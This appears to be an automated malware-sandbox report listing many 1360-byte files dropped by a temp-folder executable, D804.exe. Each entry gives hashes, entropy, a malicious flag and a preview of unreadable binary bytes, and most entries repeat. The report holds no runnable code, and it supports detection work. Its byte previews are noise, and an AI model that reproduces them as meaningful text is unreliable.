                                                                                                                            Preview:LFOPOW.>.....z.r.M.}04....,*..8.1pQ.....u..(w....C.....i%.I........O$4DW\..2.v...Kc...iqeb|..-...0......jUo/.../3z..\...G...n}7q.....Up.2..?.c.W....l.SL6.J...`~QaY..!9....an..K...DAoJ}..........$qWK.yh.U.....Y.u..T"..m......}..8"..i'./.?...w..D..K.._.C.....4.....Hm.....~@|...=..WK.n..Rw......F\.$.?.y.B.6.....z|.3I.lxpe..#e......~.K.-W....7}X.87.........G[.H.P.O%..A......r5....l..@..P..P!6+..j...x.S..=..IJ6T.xzEQ...Y.j.J.'...l.0....4A.}.c}E.......n.K.x;...Nz..Aa...6..L.;@O(..v.a\...V\Mz..\.4<......:...Ys)U1V...x...]..u:. '.........lF%(`....H...!.p.._q.....\.....w4....N.l7)..Y&..t..8D|....G.S}.J.(.cn..5..H..l.7?.H.!q..E....8oy.sr(....<.CC.g.~...0.B.j.F.I...ap..VY.....K..-..E..8......F...A..;1.....e.$o...0.tcU&_lv......|P.iH..>^.|.B.b.N._..X...?....d...W..XKz.e.?..0....`0..QJ....jp.r.....jV.P..g.6.(K .hI..z.......-...?L|.F..|.".....&D..A..{.D...[_.T>.......(u.\.....^...H-.....u..jo..C....[f.r.X.|...{..g.....u.^.g5t=.0..... ..0O ./..r
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.822811184260018
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:y4dWOKIpjkUrwXRdbdelWYR3vEfCeXjtnubPToIJdwSvcPrJoUQEIZo7bD:yfO/tkUKdbaWi3vE1jdEPzB0PrwEGED
                                                                                                                            MD5:7A0C7E6D65962EFB7F74D1C8E9224519
                                                                                                                            SHA1:2778C98C36E47AD89F5E52E11DDFD88B78AAF5F0
                                                                                                                            SHA-256:59D6FFAD1474FD2D62F8CC6B102690B0CDE2C071255DF11A0295EEE49ABED6AF
                                                                                                                            SHA-512:40E6EC378E85330E57094A93E10FB1B6A19FE661119EADFEDBB7A1C33A5C1AFB293129339E0F41C3030AC129D4D2448C6EFAB3497DA621E44FE5BFDE3743E527
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LFOPOW.>.....z.r.M.}04....,*..8.1pQ.....u..(w....C.....i%.I........O$4DW\..2.v...Kc...iqeb|..-...0......jUo/.../3z..\...G...n}7q.....Up.2..?.c.W....l.SL6.J...`~QaY..!9....an..K...DAoJ}..........$qWK.yh.U.....Y.u..T"..m......}..8"..i'./.?...w..D..K.._.C.....4.....Hm.....~@|...=..WK.n..Rw......F\.$.?.y.B.6.....z|.3I.lxpe..#e......~.K.-W....7}X.87.........G[.H.P.O%..A......r5....l..@..P..P!6+..j...x.S..=..IJ6T.xzEQ...Y.j.J.'...l.0....4A.}.c}E.......n.K.x;...Nz..Aa...6..L.;@O(..v.a\...V\Mz..\.4<......:...Ys)U1V...x...]..u:. '.........lF%(`....H...!.p.._q.....\.....w4....N.l7)..Y&..t..8D|....G.S}.J.(.cn..5..H..l.7?.H.!q..E....8oy.sr(....<.CC.g.~...0.B.j.F.I...ap..VY.....K..-..E..8......F...A..;1.....e.$o...0.tcU&_lv......|P.iH..>^.|.B.b.N._..X...?....d...W..XKz.e.?..0....`0..QJ....jp.r.....jV.P..g.6.(K .hI..z.......-...?L|.F..|.".....&D..A..{.D...[_.T>.......(u.\.....^...H-.....u..jo..C....[f.r.X.|...{..g.....u.^.g5t=.0..... ..0O ./..r
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.868850440755465
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:AdSy/hos9+1BLZjBGlaFfA0BWJ11UH2KjRbiIDsTiy1l2VijwZjG7sbD:UCs9+1BLY4/C1UWK4BH1l2Vlx5D
                                                                                                                            MD5:CA35043CCD05D3CDCCD5B4AD8E2E060F
                                                                                                                            SHA1:D1D5151101D8A0B6AC9CA162AE32F6422408DAEA
                                                                                                                            SHA-256:34C9187055110A0B07DF31212083B88093494E8571324744F2F90E25C4182966
                                                                                                                            SHA-512:740E19B42056C5F8422B1005D2A0DEB5C352BB5BEF71DF203C1411808C2301D85B2F19814B0FE9BADF1F5AA7250A788A2537C1511066D24C07C09007B91AB9FF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LFOPO.`..%..w....7.....Z)...+b.A....0T...p*h...{(..R...w.H.94.C.Xq..~...,.>d.k;...d.|.,.,...a...D..e..\..U...@N..sK.y....9......m..1..a..FS....6.q......M0...P`H...w.ae......^.f@..~.+O...-..'Q.A.K.....%.n.u.....g..!......$.. ./......%3..(.U..]....=..E..v..|.l!/....[d..\.......L.=.........|.......1..i.JC.JGA....=f ........`...}..)...A$Q&....I.sZ.......,I4....2.q...?[.F.2t..b{.....w.d...Y].?...z':....<...8MGe...1...hY.X...s.2m..$:.P0`.}..a.1}.g...G..36Z..+.I.\.|.=%..C....V!.3....E..~:._mj~....{......K..5...;.@#...P.d.O...$...6F....fC...E.f4~.......Mu.._|.....3,l.y.....T......jf....b....v.._..zT..q.sG...A-.7..Eq>..V.M7.H..........y..).1..0i......W).`vtq.a..<`}r.r_07.[..Ds.Z....~.JyP .v.......Y.h.....4Di....^.#V`2....K..\.?.....g......V..I....B..Z..!...<.G^.Z.C.....F.;.N.`[!e....@..C...B..6.9..XU.c.H..n1..7.z......{.[...o..eG]..,/P(.1. .... !..T.^..:.i.I.kl=.....n....XWF...BSO..2{.B..)...E.e....M"..P...a.q;Z..../>.\.M..).{0.3..x.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.868850440755465
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:AdSy/hos9+1BLZjBGlaFfA0BWJ11UH2KjRbiIDsTiy1l2VijwZjG7sbD:UCs9+1BLY4/C1UWK4BH1l2Vlx5D
                                                                                                                            MD5:CA35043CCD05D3CDCCD5B4AD8E2E060F
                                                                                                                            SHA1:D1D5151101D8A0B6AC9CA162AE32F6422408DAEA
                                                                                                                            SHA-256:34C9187055110A0B07DF31212083B88093494E8571324744F2F90E25C4182966
                                                                                                                            SHA-512:740E19B42056C5F8422B1005D2A0DEB5C352BB5BEF71DF203C1411808C2301D85B2F19814B0FE9BADF1F5AA7250A788A2537C1511066D24C07C09007B91AB9FF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LFOPO.`..%..w....7.....Z)...+b.A....0T...p*h...{(..R...w.H.94.C.Xq..~...,.>d.k;...d.|.,.,...a...D..e..\..U...@N..sK.y....9......m..1..a..FS....6.q......M0...P`H...w.ae......^.f@..~.+O...-..'Q.A.K.....%.n.u.....g..!......$.. ./......%3..(.U..]....=..E..v..|.l!/....[d..\.......L.=.........|.......1..i.JC.JGA....=f ........`...}..)...A$Q&....I.sZ.......,I4....2.q...?[.F.2t..b{.....w.d...Y].?...z':....<...8MGe...1...hY.X...s.2m..$:.P0`.}..a.1}.g...G..36Z..+.I.\.|.=%..C....V!.3....E..~:._mj~....{......K..5...;.@#...P.d.O...$...6F....fC...E.f4~.......Mu.._|.....3,l.y.....T......jf....b....v.._..zT..q.sG...A-.7..Eq>..V.M7.H..........y..).1..0i......W).`vtq.a..<`}r.r_07.[..Ds.Z....~.JyP .v.......Y.h.....4Di....^.#V`2....K..\.?.....g......V..I....B..Z..!...<.G^.Z.C.....F.;.N.`[!e....@..C...B..6.9..XU.c.H..n1..7.z......{.[...o..eG]..,/P(.1. .... !..T.^..:.i.I.kl=.....n....XWF...BSO..2{.B..)...E.e....M"..P...a.q;Z..../>.\.M..).{0.3..x.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8601419602885585
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:9b+wY9JFwd/Ta2PpVRjYfUIP7/cDqcqDZtFjOuP7Lj3w6f0b2vuWWNLaK89bD:9kbi5TbxknDKqjvFjOuP7Lj3E29f3D
                                                                                                                            MD5:7DE9D9D42F41CEA67DB6C07FF2284B4D
                                                                                                                            SHA1:A8F0594CD749540EB69A5D9B1A871F03FE44F6B5
                                                                                                                            SHA-256:BA07BADA6F282D3A0EB7CEF900D5E49C5D30675B31681AAAB21CF6DDCB2889CE
                                                                                                                            SHA-512:8D748EE73E773170B8FE011FE9CE3D9A8DF5A3A15191616382B57EF63217927CFFC0DDCC37274E0D3510A74F507B3A876863426CC1A83854B46582D1E0822178
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LHEPQ|..K..h_..d<...L.(.K.vc.z]..Z5...B..(..6..b....v.j......g....66.B.3./%U`...zl........I...c...v...S......6.G....+.`.H}....v....<......U.....Jx....].....E....[..{Wg~.KT.....K.%x......~|..c.F....jd....w......=.+.$,H......e..ai...pt...G...Z..2.I.O.$.%.]...;08l.ESN..Q.[gu..H...@z....N.`Z...M..s7.}.........4.`;e..\.(.r.M..t.....(U...f.U\.l....1......"p..xv5+...U.*.h0..S..5.U.m.e.f0.n2V&1.-]..M.t.@.kg..b.n;.l@.0K.W>.!BX.,.."...=.dG..Gt....p...h'.'...v[q...H..^>.Y......Nr.D..$T.....y.d.=..._mN.......4e...S....^....).h"K...Z.........}....<Ap.~....d...2..!...n. .MJ..M..@.e.i.=...X...qpw+.J0.C.q...o.n..\..-W.c.$vP;0..EA...J.L.....C.1...E.D7'|:...=P.3.HB..K1..A$./S...,.X....t..t.2..E.w.c..._..Vf.Akd..1\..%.q...gW.h..X'.-...f$x'..KV..!...5tx$.z.e.&.(w.wC......m.!yA.\.Ff.~?..}@B.j.......A...B....-.zX..RL..b...5O9.....Ta....b.[|k....h..2....K3..k...-&.'..^....:...;F^..!..'XL.lD..Q!$i.[.G.<....."K...x.m.A>..1U..y..R.;F}c.).EU.&..........0.[+.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8601419602885585
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:9b+wY9JFwd/Ta2PpVRjYfUIP7/cDqcqDZtFjOuP7Lj3w6f0b2vuWWNLaK89bD:9kbi5TbxknDKqjvFjOuP7Lj3E29f3D
                                                                                                                            MD5:7DE9D9D42F41CEA67DB6C07FF2284B4D
                                                                                                                            SHA1:A8F0594CD749540EB69A5D9B1A871F03FE44F6B5
                                                                                                                            SHA-256:BA07BADA6F282D3A0EB7CEF900D5E49C5D30675B31681AAAB21CF6DDCB2889CE
                                                                                                                            SHA-512:8D748EE73E773170B8FE011FE9CE3D9A8DF5A3A15191616382B57EF63217927CFFC0DDCC37274E0D3510A74F507B3A876863426CC1A83854B46582D1E0822178
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LHEPQ|..K..h_..d<...L.(.K.vc.z]..Z5...B..(..6..b....v.j......g....66.B.3./%U`...zl........I...c...v...S......6.G....+.`.H}....v....<......U.....Jx....].....E....[..{Wg~.KT.....K.%x......~|..c.F....jd....w......=.+.$,H......e..ai...pt...G...Z..2.I.O.$.%.]...;08l.ESN..Q.[gu..H...@z....N.`Z...M..s7.}.........4.`;e..\.(.r.M..t.....(U...f.U\.l....1......"p..xv5+...U.*.h0..S..5.U.m.e.f0.n2V&1.-]..M.t.@.kg..b.n;.l@.0K.W>.!BX.,.."...=.dG..Gt....p...h'.'...v[q...H..^>.Y......Nr.D..$T.....y.d.=..._mN.......4e...S....^....).h"K...Z.........}....<Ap.~....d...2..!...n. .MJ..M..@.e.i.=...X...qpw+.J0.C.q...o.n..\..-W.c.$vP;0..EA...J.L.....C.1...E.D7'|:...=P.3.HB..K1..A$./S...,.X....t..t.2..E.w.c..._..Vf.Akd..1\..%.q...gW.h..X'.-...f$x'..KV..!...5tx$.z.e.&.(w.wC......m.!yA.\.Ff.~?..}@B.j.......A...B....-.zX..RL..b...5O9.....Ta....b.[|k....h..2....K3..k...-&.'..^....:...;F^..!..'XL.lD..Q!$i.[.G.<....."K...x.m.A>..1U..y..R.;F}c.).EU.&..........0.[+.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8671823427657745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:h+y5aezTrmewLFFDwXV7J7y1SOq3HgP+TbhqjcUSxtOQOrS8IC1BMibD:c8aePa/Fxwn0q3HhqOMn2hCBMwD
                                                                                                                            MD5:ECEC46F711CC3D43B39194545EB8CAFE
                                                                                                                            SHA1:5F1068B5724D6C73D3A47A9C802DDF66FB41CD98
                                                                                                                            SHA-256:F5043C47B26A0E1783A136E5D3118A80CD69BC1079ADF3A0D28CEA67A9DB0D5A
                                                                                                                            SHA-512:3BBA20211D520E99E863496C35C325C6FA7A750BC5B76C0CD6B27316BF0883D324445C5901C1B7F693FDDD672C727BDED0ED14A3756A5E2A868AEDF698F38112
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LIJDS.\\..m.#........*........t.g...k.O;..[.*.Zb...}jS..,......R....M..8.....)4......@#Pz..%..).q&....{.P.M!.<..Z.f...:....+..a.."..y..|..r..F....=i.n..F..7;..T7C=...b.-...b..J.....x..!...,...1...(....B..._...r?,bV|.Z#iG....2.L..6..-.f'w?F..a......`=_....VH..h.j.t...\.Z...*.f..b..'...T ...7=.hr..2..Q ..)rl.+..l72a`...NMy.$....r/Z...2p..d..G?:..7K..'!p....4q..y..U^O}7.0.....u+.f(E..B..n;..w...Xh. h&.\.._.1.#..!z.}.'&Z.t.]x..*.....w....q+..mphO..jB......l....x....X.....=..&....,..{.....Y&O.b..........d...>.....E..*,..=.U,......K?..SQ....i..9..V......G.:g.;.~N..X..oL.X.........9.O...}.KD.".P. v..er.{..>..+<.{...t.r.${=.<.U...^Z...:,i..P....TL...0|..o..Y.+.....5..`jb....q...3l.....X......K..1....;...|...l......_..p0...%..rUva...x..!j.R....`f.\..gx...V.t. |...'xY...;......nJ....O..r.N.JI..g.......7v.YK.r..t..Y;....Em.A...I..-......x.W..........!.i..R9...!;..a.s.,..0%...a&v..I}.V.F....c...s.I@;F.AJ?.....).@>.sHZ.?././.rR((3.N.....7.[.{#.....\
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8671823427657745
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:h+y5aezTrmewLFFDwXV7J7y1SOq3HgP+TbhqjcUSxtOQOrS8IC1BMibD:c8aePa/Fxwn0q3HhqOMn2hCBMwD
                                                                                                                            MD5:ECEC46F711CC3D43B39194545EB8CAFE
                                                                                                                            SHA1:5F1068B5724D6C73D3A47A9C802DDF66FB41CD98
                                                                                                                            SHA-256:F5043C47B26A0E1783A136E5D3118A80CD69BC1079ADF3A0D28CEA67A9DB0D5A
                                                                                                                            SHA-512:3BBA20211D520E99E863496C35C325C6FA7A750BC5B76C0CD6B27316BF0883D324445C5901C1B7F693FDDD672C727BDED0ED14A3756A5E2A868AEDF698F38112
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:LIJDS.\\..m.#........*........t.g...k.O;..[.*.Zb...}jS..,......R....M..8.....)4......@#Pz..%..).q&....{.P.M!.<..Z.f...:....+..a.."..y..|..r..F....=i.n..F..7;..T7C=...b.-...b..J.....x..!...,...1...(....B..._...r?,bV|.Z#iG....2.L..6..-.f'w?F..a......`=_....VH..h.j.t...\.Z...*.f..b..'...T ...7=.hr..2..Q ..)rl.+..l72a`...NMy.$....r/Z...2p..d..G?:..7K..'!p....4q..y..U^O}7.0.....u+.f(E..B..n;..w...Xh. h&.\.._.1.#..!z.}.'&Z.t.]x..*.....w....q+..mphO..jB......l....x....X.....=..&....,..{.....Y&O.b..........d...>.....E..*,..=.U,......K?..SQ....i..9..V......G.:g.;.~N..X..oL.X.........9.O...}.KD.".P. v..er.{..>..+<.{...t.r.${=.<.U...^Z...:,i..P....TL...0|..o..Y.+.....5..`jb....q...3l.....X......K..1....;...|...l......_..p0...%..rUva...x..!j.R....`f.\..gx...V.t. |...'xY...;......nJ....O..r.N.JI..g.......7v.YK.r..t..Y;....Em.A...I..-......x.W..........!.i..R9...!;..a.s.,..0%...a&v..I}.V.F....c...s.I@;F.AJ?.....).@>.sHZ.?././.rR((3.N.....7.[.{#.....\
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.861120015473619
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:IMzyvNadOQow6jyvAMXiOvto1jPggdiIaehquHNTbBY7eWMRIXHUJue8LbD:I9LQ9kyvAMXjy1bggdiITBzRIkAe8vD
                                                                                                                            MD5:45DE4B5C5F86045EAA2707CFC80BB2AF
                                                                                                                            SHA1:7C32A32BAC17B0E8900AABAE37A6AC032F771963
                                                                                                                            SHA-256:D736145CED5866BAE90ECBF713EFCE19C02D59CA26B8D407FFE3623C88F206CE
                                                                                                                            SHA-512:C9BC75173739AD97EFA1C2A2D4ACAF15C32E8CBFC037879E009221B77530EE72EFC8079D8C17F1D2A04EB98B0D77A98B157E8F0B893F025D0939226EE40B1F1B
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NIRME.>.....#.D....W....j.s...:.d...T.].....Ll..1...'M(b,......Ap<H_.E........W'.5n.T..w..Qn.F../m-9.Z."X:..S..e.'.....cyg.'...-t...=(..5.USaefE.... .D_....!d...?....v....g_.X.z'....E7.?d.Vxp......{X...~..C.k.t..GjG.U._.j.;(..B..x......l3S.Lq.y.51.^.....M....I..4...A ..5..l..W.6....NU.'F-`..!.@..@...z4.".c.AK...B.5.<7C.w....%.0l..h.......C......2.. `Q...K-../r ]A~..n....O...)...'.T.bK.....O.o...Y......l.._..lsB..._.\*4+......|..D...S..p2R.*...*....M|.D..Q...Y<<riw.W..)...^.c.B.e.R..F].v...d.....e2@'.{m...3zxK..h.[.\u.5~.fQ..6`.7...|O.D|..8P.W.n.S......lJ...A.C(.^..."e.?...l........)...v.,...d....... !.S.gZ......A'.N..>..Z...^+.Q....=C.y.w......Lj}Y8..R..o....|.F..~.f&nOyx}.Dj.m...C.=Q....Oy^j..&dL~....N...b^t...a.....H/.*.f8....5.X.4WN...cl.DZ..>b...J......i.GIy...I.........h.eqrs.0OQ..K.>.....k...gS"iH.cVy.'...~.w.l./q....oY...f.~.[..BP...;..qg..%n...._j..Fu?..!%y....~.~. $..]i......YA...J..._...R.k.*../......)p"&..."..e....UM.v...>.:)D
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.861120015473619
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:IMzyvNadOQow6jyvAMXiOvto1jPggdiIaehquHNTbBY7eWMRIXHUJue8LbD:I9LQ9kyvAMXjy1bggdiITBzRIkAe8vD
                                                                                                                            MD5:45DE4B5C5F86045EAA2707CFC80BB2AF
                                                                                                                            SHA1:7C32A32BAC17B0E8900AABAE37A6AC032F771963
                                                                                                                            SHA-256:D736145CED5866BAE90ECBF713EFCE19C02D59CA26B8D407FFE3623C88F206CE
                                                                                                                            SHA-512:C9BC75173739AD97EFA1C2A2D4ACAF15C32E8CBFC037879E009221B77530EE72EFC8079D8C17F1D2A04EB98B0D77A98B157E8F0B893F025D0939226EE40B1F1B
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NIRME.>.....#.D....W....j.s...:.d...T.].....Ll..1...'M(b,......Ap<H_.E........W'.5n.T..w..Qn.F../m-9.Z."X:..S..e.'.....cyg.'...-t...=(..5.USaefE.... .D_....!d...?....v....g_.X.z'....E7.?d.Vxp......{X...~..C.k.t..GjG.U._.j.;(..B..x......l3S.Lq.y.51.^.....M....I..4...A ..5..l..W.6....NU.'F-`..!.@..@...z4.".c.AK...B.5.<7C.w....%.0l..h.......C......2.. `Q...K-../r ]A~..n....O...)...'.T.bK.....O.o...Y......l.._..lsB..._.\*4+......|..D...S..p2R.*...*....M|.D..Q...Y<<riw.W..)...^.c.B.e.R..F].v...d.....e2@'.{m...3zxK..h.[.\u.5~.fQ..6`.7...|O.D|..8P.W.n.S......lJ...A.C(.^..."e.?...l........)...v.,...d....... !.S.gZ......A'.N..>..Z...^+.Q....=C.y.w......Lj}Y8..R..o....|.F..~.f&nOyx}.Dj.m...C.=Q....Oy^j..&dL~....N...b^t...a.....H/.*.f8....5.X.4WN...cl.DZ..>b...J......i.GIy...I.........h.eqrs.0OQ..K.>.....k...gS"iH.cVy.'...~.w.l./q....oY...f.~.[..BP...;..qg..%n...._j..Fu?..!%y....~.~. $..]i......YA...J..._...R.k.*../......)p"&..."..e....UM.v...>.:)D
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.842703177113634
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:qQlSqZumfsFFQ5m9ISa1KHn4yTxBipZHdw6PeOZ0+vUwRfj22y3PPNiD+bD:8eya5m9Ip1GcZHi6PRZ0CUwEX/Pg4D
                                                                                                                            MD5:123F0D7F8FDA4C330F13BCBCDCE293E7
                                                                                                                            SHA1:816D9D563924295FEE5C25ACA2892779547A8FB8
                                                                                                                            SHA-256:5C004B45D4B5A7ED7C584251CC39D5A1D6ACB353E6CC70455670CF7212F521DA
                                                                                                                            SHA-512:168792C40BFA9AEC2E725F42786DEB6D63AA75E0146915225C61ECA033A8A975A721B345C1D7CB6F3E7BDEB1B9DEC99FE1B1037DB39FB0A6E6A0CF8075450AF1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NWCXB.8dE.'....@.D>..]Z.W^i....v..T..c..9.DV......?...*f'c..8SJ?!......t.r=).hiQ...u.5L]R.8..9.Y6A....$q...nFqF...>..8@{:....nA7dP..r..G...#W.e..sQ.E.+.....k+..|4..........h.5:V._..6((.......!M.*..2.PK.<..3..@u..j.....rLGP..x.........#....Ce7.CH.d~..|U7.....1...%.VP(x...N2...$x9.sh..r[.*...s..QT1......P....: .fL.....|w..EN.F..X.4Q..C..?........UX..3.H.#P.2@._...$~.......wU..p...-"B....).5...[K.6...~.).... .gi.^d.?y..0.....K.......K!.#..H.|....>|...3..S.L..f.<..y.........X...2..-r3...".wR8R..:.nDo......0.h&bn..&...q.N.=..^D.@.?.+.k..........hl.D.F.?.w.,gt.'.Nm..0P.PX.\...r.....S8...._..4....T3.Kkp....J...Au0..a#.2..Y.1~.q.P..|[..l\..U.@...8x...E\..."r..n.b..2....mx.j.q.kt......9Xi..L.\V*.l.p....Z?E.KH...........1...9..|Z.HHm........^.=.0......u.7.mP...;"G0.=5.z.#....o.y...l....o...5...%.IiU...6Y>......p:..y...'..kW.....`...e.9>...S..>G.O.....G.tR.!....G.._....n.#..h%.\.~..)d.v..Cn%.....O..5.......I'>\..<...^.Sg.S...V=.*...HAC.i...Px...._
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.842703177113634
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:qQlSqZumfsFFQ5m9ISa1KHn4yTxBipZHdw6PeOZ0+vUwRfj22y3PPNiD+bD:8eya5m9Ip1GcZHi6PRZ0CUwEX/Pg4D
                                                                                                                            MD5:123F0D7F8FDA4C330F13BCBCDCE293E7
                                                                                                                            SHA1:816D9D563924295FEE5C25ACA2892779547A8FB8
                                                                                                                            SHA-256:5C004B45D4B5A7ED7C584251CC39D5A1D6ACB353E6CC70455670CF7212F521DA
                                                                                                                            SHA-512:168792C40BFA9AEC2E725F42786DEB6D63AA75E0146915225C61ECA033A8A975A721B345C1D7CB6F3E7BDEB1B9DEC99FE1B1037DB39FB0A6E6A0CF8075450AF1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NWCXB.8dE.'....@.D>..]Z.W^i....v..T..c..9.DV......?...*f'c..8SJ?!......t.r=).hiQ...u.5L]R.8..9.Y6A....$q...nFqF...>..8@{:....nA7dP..r..G...#W.e..sQ.E.+.....k+..|4..........h.5:V._..6((.......!M.*..2.PK.<..3..@u..j.....rLGP..x.........#....Ce7.CH.d~..|U7.....1...%.VP(x...N2...$x9.sh..r[.*...s..QT1......P....: .fL.....|w..EN.F..X.4Q..C..?........UX..3.H.#P.2@._...$~.......wU..p...-"B....).5...[K.6...~.).... .gi.^d.?y..0.....K.......K!.#..H.|....>|...3..S.L..f.<..y.........X...2..-r3...".wR8R..:.nDo......0.h&bn..&...q.N.=..^D.@.?.+.k..........hl.D.F.?.w.,gt.'.Nm..0P.PX.\...r.....S8...._..4....T3.Kkp....J...Au0..a#.2..Y.1~.q.P..|[..l\..U.@...8x...E\..."r..n.b..2....mx.j.q.kt......9Xi..L.\V*.l.p....Z?E.KH...........1...9..|Z.HHm........^.=.0......u.7.mP...;"G0.=5.z.#....o.y...l....o...5...%.IiU...6Y>......p:..y...'..kW.....`...e.9>...S..>G.O.....G.tR.!....G.._....n.#..h%.\.~..)d.v..Cn%.....O..5.......I'>\..<...^.Sg.S...V=.*...HAC.i...Px...._
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.854984596398809
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:yTxPUzSY0b8l3TI3xw6GdTIUng4Ddu+9UDPCVLhfc+fgRuK0RiiJbD:yTx18lavGJVvjVeCUZipD
                                                                                                                            MD5:825A99CBA581683E404E1970A0A48F86
                                                                                                                            SHA1:7D0BAFA8DB1E473A9A90FEA96DB7447E356B8ADE
                                                                                                                            SHA-256:EF8BC7DD80C7C3B3F7AC5428CF060D22E0E6227A48F21DFCD60B5ACE5FD3D70A
                                                                                                                            SHA-512:D6C5E490835E7766425AB005734A3CE8E1D17565B19D58638F1466D6D9369A91F594BE1283BC05A31B34B185F8884DFCEF2F08898A1D99E21F88B799F5D13B83
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:NWCXBp.8.z.....-.d._!.....@..#X.."......Y..U.......cM.x~.s..T.H........Q$4..9.w~.k.....x..^5...j.%..S.o..]...1..f.M....3...U.F.A.4.?..7..uO..s`.}.@{+...e......7<..&oY#r...r...z.\.=.G.q......B...r.....)A.L.V...q.9:..\..X....tC.U.....}....m....%..F..\...X...T*.S..V..2....Z..W.......7.IV...;.....QQ.~..k^.dl.,(@r...`Lg...}.{....x.S..)f.....l......I..,.....BI.f........\.....W...?...U!/e...2....v&S.\........x....b{.@...d.[..{.....eX.r..A.{...l....#r.....%.t...L.-..._.c.N.`...noT=a..dEg.Q......\.....y{..c.C.O... 5.u....P.Qg........|.H.c....,.h:..w`I...G.0 .[...1L.....a..[.V+.).;.a~..V0dG..N.....!..A..C]!.....,.h.yG8Y.$..`|.).%..< .?..YP..<..P.J.&gR..#.|..t......5.}..[^u....D d.].fF....`Pk.}..8:..d3=.<.....H...t.8.P..u....U...)8p....N.6.pk..xV...H.).=..5eg.B...t..t............9.'.......?+.....e....y8G..@.R.H..t..I.i.._...3...-I...Y....!..*.c0.9Uf.D._..u..5.x*d..?...SJ........=..u....W.:|.&.!.7.M..5.....W..hX..J~*.-.O%..}..p".b
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.854984596398809
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:yTxPUzSY0b8l3TI3xw6GdTIUng4Ddu+9UDPCVLhfc+fgRuK0RiiJbD:yTx18lavGJVvjVeCUZipD
                                                                                                                            MD5:825A99CBA581683E404E1970A0A48F86
                                                                                                                            SHA1:7D0BAFA8DB1E473A9A90FEA96DB7447E356B8ADE
                                                                                                                            SHA-256:EF8BC7DD80C7C3B3F7AC5428CF060D22E0E6227A48F21DFCD60B5ACE5FD3D70A
                                                                                                                            SHA-512:D6C5E490835E7766425AB005734A3CE8E1D17565B19D58638F1466D6D9369A91F594BE1283BC05A31B34B185F8884DFCEF2F08898A1D99E21F88B799F5D13B83
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
